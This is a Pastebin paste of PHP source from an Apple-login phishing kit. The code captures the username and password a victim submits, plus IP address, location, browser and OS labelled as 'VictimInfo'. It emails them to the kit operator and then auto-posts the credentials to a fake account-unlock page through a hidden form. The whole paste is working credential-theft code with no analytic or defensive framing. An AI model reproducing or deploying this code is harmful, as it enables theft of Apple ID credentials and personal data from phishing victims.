Advertisement
ardiansyahiswan

Untitled

Dec 20th, 2017
448
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.68 KB | None | 0 0
  1. <?
  2. /*
  3. Created by l33bo_phishers -- icq: 695059760
  4. */
  5. require "session_protect.php";
  6. require "functions.php";
  7. require "login.php";
  8. $ip = $_SERVER['REMOTE_ADDR'];
  9. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
  10. $VictimInfo1 = "| IP Address :"." ".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
  11. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
  12. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
  13. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
  14. $VictimInfo5 = "Platform :"." ".$systemInfo['os'];
  15. $_SESSION['user'] = $_POST['user'];
  16. $_SESSION['pass'] = $_POST['pass'];
  17.  
  18. $message = "
  19. [+]========[ If Sleep My Income Stopped ]========[+]
  20. [+]===========[ $$ Apple Login $$ ]===========[+]
  21. [+]Username : ".$_SESSION['user']."
  22. [+]Password : ".$_SESSION['pass']."
  23. [+]IP info : $ip
  24. [+]===========[ $$ End Result $$ ]===========[+]
  25. [+]==========[ $$ Ardiansyah Iswan $$ ]==========[+]
  26. ";
  27. //+++++++++++++++++++++++++++++\\ ISI PESAN //+++++++++++++++++++++++++++++\\\
  28.  
  29. include '../../BLOCKED.php';
  30. $headers = "From: Login <iswan@login.com>";
  31. $subject = "[ ".$systemInfo['os']." ] - ".$systemInfo['country']." | ".$ip." ";
  32. mail($Your_Email, $subject, $message, $headers);
  33. ?>
  34. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
  35. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
  36. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
  37. </form>
  38. <script language="JavaScript">
  39. document.frm.submit();
  40. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement